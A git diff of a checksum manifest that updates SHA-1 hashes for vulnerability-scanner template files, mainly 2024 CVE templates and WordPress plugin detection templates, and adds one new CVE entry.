index f09a387743..ef359bb5dc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3757,10 +3757,11 @@ http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:de0592811b331a6594fdf4e4b4f4539766ad0ade http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 -http/cves/2024/CVE-2024-32735.yaml:63e17a4aa2eac2b360754c270259e96965af82c8 -http/cves/2024/CVE-2024-32736.yaml:6d6ddae0457fcd129b2fc3ad7df24a4e39a4edf1 -http/cves/2024/CVE-2024-32737.yaml:b3a7a503bd4f1a789e32b432926c1aa633e1e67a -http/cves/2024/CVE-2024-32738.yaml:714e1dc5026978b0c243a1d083f3ebd4ec864441 +http/cves/2024/CVE-2024-32735.yaml:b6029c669edd7049a58dda3d4109055671c3b75d +http/cves/2024/CVE-2024-32736.yaml:ed4457088b5aaafba390a062f4f80ec1c09243d7 +http/cves/2024/CVE-2024-32737.yaml:e36fdcc812a79f8c3fd68df8dc3a08bdff9ef97b +http/cves/2024/CVE-2024-32738.yaml:3973d6794b7cfd951e9c6f2db0d0d65f345fa59a +http/cves/2024/CVE-2024-32739.yaml:442f2313d2e928a2c59d7eb9518852d9218d3505 http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb @@ -3834,7 +3835,7 @@ http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 http/cves/2024/CVE-2024-45241.yaml:b32e4a46b08b7411b242362dafe333b209224ebb http/cves/2024/CVE-2024-45388.yaml:433afc604e847a5a8cc2d0d16687e3dce376a1c7 http/cves/2024/CVE-2024-45440.yaml:42079bcfe2123af3a6f602a0873e4ea18e363377 -http/cves/2024/CVE-2024-45488.yaml:add991b00cafd5efca3f4dcfaf0ac206768c1cf5 +http/cves/2024/CVE-2024-45488.yaml:bdef2670e4a81c4da4a74ad79b6311e4c6c9531d http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 @@ -7839,236 +7840,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:8230dfc92a4592b78bcafd7c478550456c256dc3 -http/technologies/wordpress/plugins/add-to-any.yaml:2098dbc990c0a1005c96222845b0bd518df2eeb5 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:3fe3690cc0131aceeea286d7591f4b2274a2bf48 +http/technologies/wordpress/plugins/ad-inserter.yaml:ec4db3ed1695e1b027d729230186bf4b5fc11bb0 +http/technologies/wordpress/plugins/add-to-any.yaml:f2ef8ab53fd3fd5b87f12dc897d4d7172de6c53c +http/technologies/wordpress/plugins/admin-menu-editor.yaml:2c4449d4dadc26bb40b0d104d6b2dd6ba4b421c2 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:29c4d8c18e278343480d88a4b240364870a7cd5f -http/technologies/wordpress/plugins/akismet.yaml:94b35f1ffd0429ceebbdfa46867ce2780958462a +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:1d4dff47bf44bda0a0b5ce3b9e6c926265907d0c +http/technologies/wordpress/plugins/akismet.yaml:109a4c8b9612adc808074db0c8fa0a02cfafb1f0 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e010806b57fec6aed684513a3d445f1e836228b6 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:d40772610e8f19686ba461fc65e422d7289d0eda -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3c9e3982e049e093ccdeef6d30786068606a6888 -http/technologies/wordpress/plugins/amp.yaml:6ed6b26ac631a3b0af15f158448e5b8f26bb6610 -http/technologies/wordpress/plugins/antispam-bee.yaml:c573b8e2c4002849264538eaf5c150bbfdce62ae -http/technologies/wordpress/plugins/astra-sites.yaml:afe2f518e45cc230000d9604305156d545f87fae +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:de9606680255e11d11247c65d734d7cf12029fff +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c2852bf2a4a49b673981fa6bcdc898fd10f41888 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3303ac37f225a71a4a980106e6e4208db419a00a +http/technologies/wordpress/plugins/amp.yaml:badbc4684ed6c5cfe61855119dd317cb5c854185 +http/technologies/wordpress/plugins/antispam-bee.yaml:922bfd74018911f5cdef8d529d28fe0a2310e2c7 +http/technologies/wordpress/plugins/astra-sites.yaml:0df70bc2443e7fe0efbe6cad05723c1e4be13673 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:1dcf06b1d44294ae7b184382e9945f035b345e6e -http/technologies/wordpress/plugins/backwpup.yaml:7e77cac4cae801649b0214ceb1f73c21b66ed0c4 -http/technologies/wordpress/plugins/better-search-replace.yaml:68c5d3a7b77b980ffb5550bea65409a5b8f3dc61 -http/technologies/wordpress/plugins/better-wp-security.yaml:bd08f8746a5cd0827b895c2bf2801d990569042b -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:abe3882099db0cf57432d61ac49d9c44e6f1765a -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:4aa97da8469ea935142517c86315acb561e4eda7 -http/technologies/wordpress/plugins/breeze.yaml:72437f7cf22b89bac4bd8ad48352f0dc8be89b7d -http/technologies/wordpress/plugins/broken-link-checker.yaml:ea840922e06275bd637e119845eff00cb70845aa +http/technologies/wordpress/plugins/autoptimize.yaml:2aece994eaf7ec4150f0a08fa5e6aa52a7ae0e7d +http/technologies/wordpress/plugins/backwpup.yaml:524a5e642b693595666d51605ef7aeb9985216e9 +http/technologies/wordpress/plugins/better-search-replace.yaml:3fa7b08bad3a75237b1f81e98cd7423f5e239584 +http/technologies/wordpress/plugins/better-wp-security.yaml:85bdf68e5f5c6aac66cc7dd499aadb977db4c4b3 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4b824c6ead37432006c286b3ead42303641f6713 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:50ac8b0de217fa88f1bed1760431d48ff5787003 +http/technologies/wordpress/plugins/breeze.yaml:d8266ea3b0832742d7176ea6405f3b696f82aa50 +http/technologies/wordpress/plugins/broken-link-checker.yaml:31094793f1adc4447e12a418d1450e087ef2841e http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:a6d483f3462a589c0791b225e47c71d75d15d95b -http/technologies/wordpress/plugins/child-theme-configurator.yaml:b24d8bb234460308e1655ca7888a33e52e48e069 -http/technologies/wordpress/plugins/classic-editor.yaml:2f84527650f38b4a7e2efa0a347f9cef933f6223 -http/technologies/wordpress/plugins/classic-widgets.yaml:fb8af1486b121cee05cb1536bc17f5ae53c82079 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:5a6e9d0817f05f1737d9ef0544292422281db20b +http/technologies/wordpress/plugins/chaty.yaml:f2b39df3db3290297e5ab240880e4db56064efbf +http/technologies/wordpress/plugins/child-theme-configurator.yaml:9111ba2081eec0430fae41438a2bc5eb4af41ed5 +http/technologies/wordpress/plugins/classic-editor.yaml:f2388ffcd352a68dae939a7b2d1dc3e29f9a73f2 +http/technologies/wordpress/plugins/classic-widgets.yaml:d9a338e4bee746189fb498289d33163de3cb709a +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:5ab50ca39ea4b066eb9af436d6d2b0691783c7ff http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:17ec8845a573d9a4dac064944ee90a50af3e8f06 -http/technologies/wordpress/plugins/coblocks.yaml:ee6ce652eb1739dc7c2e97cb82ad96fa91b29a74 -http/technologies/wordpress/plugins/code-snippets.yaml:bcc987741a30cc430aff3876e3c449f207f227d1 -http/technologies/wordpress/plugins/coming-soon.yaml:2fbb10b1ea68f6485cc29a5589f4c1fbce0f31dc -http/technologies/wordpress/plugins/complianz-gdpr.yaml:e243bf1a183195b14b0752e45eebb64e62d26357 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:36fc6384c0fd9cb81abc64ceada7743d5928b168 -http/technologies/wordpress/plugins/contact-form-7.yaml:168ec0ecc42d7bb36c4afedac6cbeeec950c1d50 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f0a2cb271fe4884418048f2f300e36febaf4cde6 -http/technologies/wordpress/plugins/cookie-law-info.yaml:96edc79177f158a16bc00ffff7d1835a462093fc -http/technologies/wordpress/plugins/cookie-notice.yaml:25e0b387e6d4da7dafdb89cff9b7a03edd42a9d9 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:dc1dd2bd0232304c1c601d5a1ee4a1e69da27ec5 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:419e9c963b63a1475b57b90f146d600b566104d3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2ec4ff55bc3341e01e84baff2bfe5755cd2ec8a5 -http/technologies/wordpress/plugins/custom-css-js.yaml:74cf5027a3e7fc28f29167955d1fdf818c4911b4 -http/technologies/wordpress/plugins/custom-fonts.yaml:349938e612ffeab74b9e3a63534bcc442764b520 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:d72bb5713a663f49f5f2dfc6b7b1946cb02370d8 -http/technologies/wordpress/plugins/disable-comments.yaml:d1a772efd1cb589f52cb7cfbdb55490732b5b756 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:e33eeda99f0aed363cd4858dd533d44c4a1e98e8 -http/technologies/wordpress/plugins/duplicate-page.yaml:039ec4470e85f55d4ab047729b090de6d4add8b5 -http/technologies/wordpress/plugins/duplicate-post.yaml:d0a6e059b5fe49e816645074e1d196f61ef4d693 -http/technologies/wordpress/plugins/duplicator.yaml:7007c32b7d0004deb232e99a7f8e3046a31b876f -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:fea265cbe41d85537efbadf731a87f0bc039cd4f +http/technologies/wordpress/plugins/cmb2.yaml:9407edaa76554117d08c24b64c7472d88175070e +http/technologies/wordpress/plugins/coblocks.yaml:da034e5d8c0c9d094131373999e64c548b820710 +http/technologies/wordpress/plugins/code-snippets.yaml:15c40c66811bc00d6f246d362d9c72cd08223046 +http/technologies/wordpress/plugins/coming-soon.yaml:cbd37b0d25bf8b8d755650325e37ad80787f9203 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:2126668a3f6c289359efae414662cacf8fafb930 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e221857041221f3784a6782739cbf886ab78fc79 +http/technologies/wordpress/plugins/contact-form-7.yaml:2551e3f06869d5a9d5b8a7d3f4a30b2638dac9e4 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1340f5484fb9adabb3ee662a006dc1c8bfad68fb +http/technologies/wordpress/plugins/cookie-law-info.yaml:8aedecd27a092c0d104e2f6aa13d32906daa067a +http/technologies/wordpress/plugins/cookie-notice.yaml:d186370e607312a7e41986edfa91287ef31f446e +http/technologies/wordpress/plugins/copy-delete-posts.yaml:5cdbdfa32e777c2106addaeaa9efb28ecaea58ae +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:dfb24a84d5302781867de4bd3fb9204972b03da8 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:059a41874ab73042696064e66b1f304c88d4b7e5 +http/technologies/wordpress/plugins/custom-css-js.yaml:a4497b88e57d74b6bd13592d3340d64459c4dd5f +http/technologies/wordpress/plugins/custom-fonts.yaml:81b6222f545992ccfe96c6332f374af93657d3a8 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f9acadcb8447ce89358390c31e0fb87e28fbb336 +http/technologies/wordpress/plugins/disable-comments.yaml:dca7f8758428eec996bb4fceb343735a5f1eef31 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:926d325df8e673f7e328d7061651718958686889 +http/technologies/wordpress/plugins/duplicate-page.yaml:9b23691a50f4568fc4bbd007a415c324e977f731 +http/technologies/wordpress/plugins/duplicate-post.yaml:c61762e842c563f33416e6537459bf70c3bd63de +http/technologies/wordpress/plugins/duplicator.yaml:314604474354b44a61d1592901cc189a176d93cd +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f7c3e5baf1d0488d4479e27539e99ace89b91499 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:1645b284afc676660983a66f5cd61050e54691e3 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:512bf0fd8c273f9fc8d31f56f4fee5489d36721e -http/technologies/wordpress/plugins/elementor.yaml:d9225847e6240e5973b150ab949b696a3f627b6c -http/technologies/wordpress/plugins/elementskit-lite.yaml:69a35fdc37262f0208fb5dc2fc2cf0ddfc4ecb60 -http/technologies/wordpress/plugins/enable-media-replace.yaml:54e8425d0779ab782b01c4b430e419076b647601 -http/technologies/wordpress/plugins/envato-elements.yaml:ec077b58a0d8ddbbcbf63529764947ebceecb4de -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:32e281565df39d242a116c496d516f455b5426ea -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:d554b840f1b80facc3dff6a5669a45ffe03d031f -http/technologies/wordpress/plugins/extendify.yaml:cb0b9b6049a93c0261665248e8ecf560c2ac66ec -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:645cdbe74d3f409e622115678e00688163bdf684 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:6452acd2245fccf9471a45f0991b8d2efeca9dec +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:a7997e826c46cfe3f15a7449e97a6124df0c833e +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:43e91d74bf8c3a8393d04851a844af2431bc9b7a +http/technologies/wordpress/plugins/elementor.yaml:19f42647b09bb8f3ef589b0909faa2a73f6a0cdf +http/technologies/wordpress/plugins/elementskit-lite.yaml:f08c4210589d9d0825e279395d2ed6e1dfc94cfe +http/technologies/wordpress/plugins/enable-media-replace.yaml:f9e36969096d90e62f5eac264d0e0660eeab844f +http/technologies/wordpress/plugins/envato-elements.yaml:7464ebb6668f551e7de1657693f092e7050f2509 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e2eb5c286dafa318dd734fb5fc3d8776f745b006 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:3b4cabc4b114f090fd7a38e0e45853e6f81aeb57 +http/technologies/wordpress/plugins/extendify.yaml:1d3356a02808f9da73bae126e733b2e279becbb0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:d82bac3bf0c5f8b436e78e0498f0f2d47bdcdfa6 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:9bd4bb2cfd625323423304019f202ec86c69dbe4 http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:392fe2779fae63333ea0766d79f9721fc9641eae -http/technologies/wordpress/plugins/fluent-smtp.yaml:136b298572179d69e387f3e1bef8ff84ae348a26 -http/technologies/wordpress/plugins/fluentform.yaml:a9c837ad39520dc72539bb3b81ef9e74b4fa5917 -http/technologies/wordpress/plugins/font-awesome.yaml:ec197c6b4731021f311ff0062857c20c459341fe -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:441379fa38428de91cddd4900ded595c30b480ae -http/technologies/wordpress/plugins/formidable.yaml:d0d1e3f76c75726e5ee05898f159fe45a6a6dc4b -http/technologies/wordpress/plugins/forminator.yaml:582aa7948879ade40b9c9e7d3c4dcb33e088fbca -http/technologies/wordpress/plugins/ga-google-analytics.yaml:88eb30f50bbf5ce1628b5f4019e6a43c5f6f790d -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:7895d7bb5e325080e7d6aedc3c246dc4167a4b31 +http/technologies/wordpress/plugins/flamingo.yaml:1b03fdaa48077fbabedd6f6064c6b19ab6bf92cb +http/technologies/wordpress/plugins/fluent-smtp.yaml:c7f2c4b8b1c94f00aea62606a8a2b87fad430443 +http/technologies/wordpress/plugins/fluentform.yaml:c3820805b10c48953b8720fbbf761ed42555c8fc +http/technologies/wordpress/plugins/font-awesome.yaml:ab1d650924ae347cc8e5edeccdc557819c25257d +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:97d3b7fe92f7e63546fb0d8a56904f474280652b +http/technologies/wordpress/plugins/formidable.yaml:2ec8741a793b6619336794b96c397ad560fe6946 +http/technologies/wordpress/plugins/forminator.yaml:fc65eabb99b3170f4d7cdf1f7843676903cea645 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:0aa9d294e064508cfa3d634acc837690109bd3c6 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:139f751f82a52f561b9690dc56792a654e5a6427 http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:7219a3d30a50834fd5f8c5f244e7e0ceaf8e0792 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:3a061b2dc4ac873d25af2e7753d3631baefb63c2 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:159e29b76e9330cd54842055a66d4c2fa219c833 -http/technologies/wordpress/plugins/google-site-kit.yaml:442546a9561e1be8eff96c1ee5362d3aaf24eb21 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c616d5fafa611b965e93ae42d8f85dfe25a28efe -http/technologies/wordpress/plugins/gtranslate.yaml:940960cccd1f088b16e3aa6248ce562d41a08aec -http/technologies/wordpress/plugins/gutenberg.yaml:8094a3a0c522ab2595242e48fee5be75770503ff -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:4e7dc421ce95c806c6e2ddef900fac785abf08f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:95497f964f2c6976ae6fdca33d1deb35d735106d +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:79e3969d0870bc972a16777171b779f4e8859e9c +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:3b8769f804c97d2075269074988fa39165057f90 +http/technologies/wordpress/plugins/google-site-kit.yaml:253ea53fb823e9eb0985d9694e723090e3e385a2 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:556ed103694802f82c557ec0cf6429d1ad21bbd8 +http/technologies/wordpress/plugins/gtranslate.yaml:d333346ec773bf93f43bf2e063811902f8769c84 +http/technologies/wordpress/plugins/gutenberg.yaml:fa0e3a7dde89c83a3a9035ef0320510c721dc076 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:359cc9c0bd85a9dfb18e54a18e543e900d454384 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:d1b0019f75712b0c6bf1daea31f9b490f2dc1840 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:376604b69e20a93804010bffbaebbb1d297f2896 -http/technologies/wordpress/plugins/header-footer.yaml:a8ba040f403be590b1ed312c4e442c550095856d -http/technologies/wordpress/plugins/health-check.yaml:89f42222df90765c9046df5e4785deb596c733f6 -http/technologies/wordpress/plugins/hello-dolly.yaml:ba1ffc079e92a69d69b5c87442a0940a8dfc8103 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:48259133ebd3167376b2d51da3d798309503191e -http/technologies/wordpress/plugins/hostinger.yaml:4e019bc2d54015c10613563010e36e8857fa83d7 -http/technologies/wordpress/plugins/image-optimization.yaml:2c55cc79f44e4cd5cf3184e18209d107a338c6e9 -http/technologies/wordpress/plugins/imagify.yaml:f7371f0bbae61d12acfff5f308343ecb9c6b9160 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3a9e37a1053b5e717e0e624c9105b08b4cb8fab6 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:840df111718eca093cc89285d92993845a64f6cc +http/technologies/wordpress/plugins/header-footer.yaml:5dd243c4b1245353f31c86f50765c25a7a84af6d +http/technologies/wordpress/plugins/health-check.yaml:55dd7a3c58885aa78213bc1eaed1c83905dcd618 +http/technologies/wordpress/plugins/hello-dolly.yaml:38549911a03e61dcae225a1c4c292074dd1fbae9 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:c92ea65cc7c694d4c93709a7a96c0182a283baa9 +http/technologies/wordpress/plugins/hostinger.yaml:d6931dea9264af3dee4a904c496bbc194e8f48ba +http/technologies/wordpress/plugins/image-optimization.yaml:4a49699c8963b05db30ca7c5a8740b24e4b0d2ca +http/technologies/wordpress/plugins/imagify.yaml:9f9cd9a136ea1e01027fbe62c71956a34fdf3fa5 http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:64bd68dd6ac3948333231c5d2b82b35247368046 -http/technologies/wordpress/plugins/instagram-feed.yaml:c1c5dc7a28a61fe9aa22b93220870fbec34c865b -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:ac35166c9b88b99905ddbe4d2ba38448b33abfb9 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:951a34b87c2885e6c30573fe746c7adf03f59ad7 +http/technologies/wordpress/plugins/instagram-feed.yaml:ed9e0883b47549e2d5160f16cd24a30c0b594fad +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:3a9a3e681222a0cf404bc855d26eae0a164c6200 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:a7a0bdb57097f57896bde9f81ddeba7081baf596 -http/technologies/wordpress/plugins/jetpack.yaml:e3d1048b1e864c4d0e68c95295385060d271b908 -http/technologies/wordpress/plugins/kadence-blocks.yaml:a15e964020deccb8c584b5b632b36d7517d7f580 -http/technologies/wordpress/plugins/kirki.yaml:6b1906dd79aee63c29823291438f7a1c567d4ef9 -http/technologies/wordpress/plugins/leadin.yaml:d9e8a8bf14d06e81a4565ff3b599e3e99f84777c -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a5d8cec4ae982835bb0fc62be540a890ff27fb8e -http/technologies/wordpress/plugins/limit-login-attempts.yaml:b30294f4c5fcbc93ceec252b18d71e4cd6290eca -http/technologies/wordpress/plugins/litespeed-cache.yaml:685ca81eec4b32bb560075f817225744aeb0c210 -http/technologies/wordpress/plugins/loco-translate.yaml:0f66c8847f947e796149070d229360cc4f6a551c -http/technologies/wordpress/plugins/loginizer.yaml:560033e2f85ef6d16e7c818fc50edc2f33e7724e +http/technologies/wordpress/plugins/jetpack-boost.yaml:db91aa9879c381bfd6f06b0145890499a9c584ad +http/technologies/wordpress/plugins/jetpack.yaml:bd689f87e9883fb948c8a0ef2c35a2ab67756f29 +http/technologies/wordpress/plugins/kadence-blocks.yaml:254dff22e9483f968e1aab30d75e29d109b54e45 +http/technologies/wordpress/plugins/kirki.yaml:3e378c7b547221102411bf2ee9c264dcec416275 +http/technologies/wordpress/plugins/leadin.yaml:c9cbde3f31a1751e5dbe4a078ce79d0c78d07441 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:275de54e643e6ccf309c75e39686a90ae142b6ee +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7948434f380d1588f120746848c19bc46c4318bc +http/technologies/wordpress/plugins/litespeed-cache.yaml:f2b73fd30a451e343a6e6cbdfa1b4afcb1eb601c +http/technologies/wordpress/plugins/loco-translate.yaml:d7a24d51f76789c52ec7b143346fbc9d7e725021 +http/technologies/wordpress/plugins/loginizer.yaml:69d2d5c312c230c344ffae5fb528db3dc9baee5a http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:2f666412ad2a197761e17587fb51950d086551e9 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:31677083f1bfe40c72cf8ac238c7e0368ac8c1ca -http/technologies/wordpress/plugins/mailpoet.yaml:12236459622976912afeab09fb09f9432d850d81 -http/technologies/wordpress/plugins/maintenance.yaml:54d20ca1d27df3de827a73ddb5dc98f1f5596b11 -http/technologies/wordpress/plugins/mainwp-child.yaml:94a5d57a5d96ec0b490459d3fc940e8487fa9dcb -http/technologies/wordpress/plugins/malcare-security.yaml:0a5466b4ec4d849df0aa6e489248b4fb47f9f2ff -http/technologies/wordpress/plugins/megamenu.yaml:af3b48b0aec0585a896c47bb7dc1da757d3ec5e6 -http/technologies/wordpress/plugins/members.yaml:7335dcd2a7d9fee497bfcf6c0a21a143827d7a4f -http/technologies/wordpress/plugins/meta-box.yaml:68080dabb9410ac5d4ac70e0462319aa0800ae44 -http/technologies/wordpress/plugins/metform.yaml:dc2dcda881d7526aca2f11cde80bff4f543ef9d8 -http/technologies/wordpress/plugins/ml-slider.yaml:607274149de774d07cb73a3bf765d5d787886cbe -http/technologies/wordpress/plugins/newsletter.yaml:2f0c9e6ebbc432141f735802499304325fed631e -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:58280842a2a22f585b5ec11cc81a7f772c56bd44 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:4c63e8c894bc5e8759bf906441b8e4c1848b3838 -http/technologies/wordpress/plugins/ninja-forms.yaml:c76961712b00a8c03031190bb646300b8af57a3e -http/technologies/wordpress/plugins/ocean-extra.yaml:a837b73dd3c61eb7b671622e3c9aa83097ca7a8a -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:a9c37cff74d4edde7184e94af8f6f457674e8335 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:38807bd0dd3f6521fc03c94bb8beb2f9a6302173 -http/technologies/wordpress/plugins/optinmonster.yaml:46b5ece9ce49d20a8d5f8e31cad555839b223d0f -http/technologies/wordpress/plugins/otter-blocks.yaml:16541990df31382b84b40bb8e3175ddbacd5e46b -http/technologies/wordpress/plugins/password-protected.yaml:0c560f6165d28822be08e8e435ba28f45262069e -http/technologies/wordpress/plugins/pdf-embedder.yaml:8f8ad600c6b2036b53d03f2c5a509a2d4cfd66d7 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:2ab988ce57a0f57fd453e1e23c785f757b4440b6 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:adff38da0c70eac67ca7386343334a62bfbc54d3 +http/technologies/wordpress/plugins/mailpoet.yaml:5fb2f2b5a9bc1cceb285679bd7bb1bd13433f638 +http/technologies/wordpress/plugins/maintenance.yaml:3c35803420907bb64ef937128e921005bef3816a +http/technologies/wordpress/plugins/mainwp-child.yaml:508d3ee9de4ae79b3489b87a5e5778668764898e +http/technologies/wordpress/plugins/malcare-security.yaml:1b7decb10134e5305fff44f7b609780fb4ef8f61 +http/technologies/wordpress/plugins/megamenu.yaml:53a9864c078b330b9ab3040673437121acce61c7 +http/technologies/wordpress/plugins/members.yaml:2f7179a199387f55fda03d4c1d5647d862ad7b7c +http/technologies/wordpress/plugins/meta-box.yaml:c0a95b3adabde6c997dbaed5e2c158bea02b73df +http/technologies/wordpress/plugins/metform.yaml:6c775f06e86f78ab75c11ae4f476dce3fa5d9572 +http/technologies/wordpress/plugins/ml-slider.yaml:06c781352dc031bb1ce860b95a8b7c01904ebc4e +http/technologies/wordpress/plugins/newsletter.yaml:21e8af44fce527dbb668efa460ef42b6c6f3004f +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1aff7b61f63c149e743e78d869724ea8e3f8507e +http/technologies/wordpress/plugins/nextgen-gallery.yaml:9e1e032419c364bd8f2f11f5075df911a88fa4af +http/technologies/wordpress/plugins/ninja-forms.yaml:ab5174dc1ccf9970ce8986d403a17d7057cde392 +http/technologies/wordpress/plugins/ocean-extra.yaml:99f84752a83ba520751dbdddd441aed5eddb318d +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:2a8bd9cec798c6f7ed95321c7b5a781956e57914 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:05c0d6e753a5ece8c5c93c04cd4dbf36202d50d9 +http/technologies/wordpress/plugins/optinmonster.yaml:5addb3da2b4969dc69ef827d724c24b0fcac3e0b 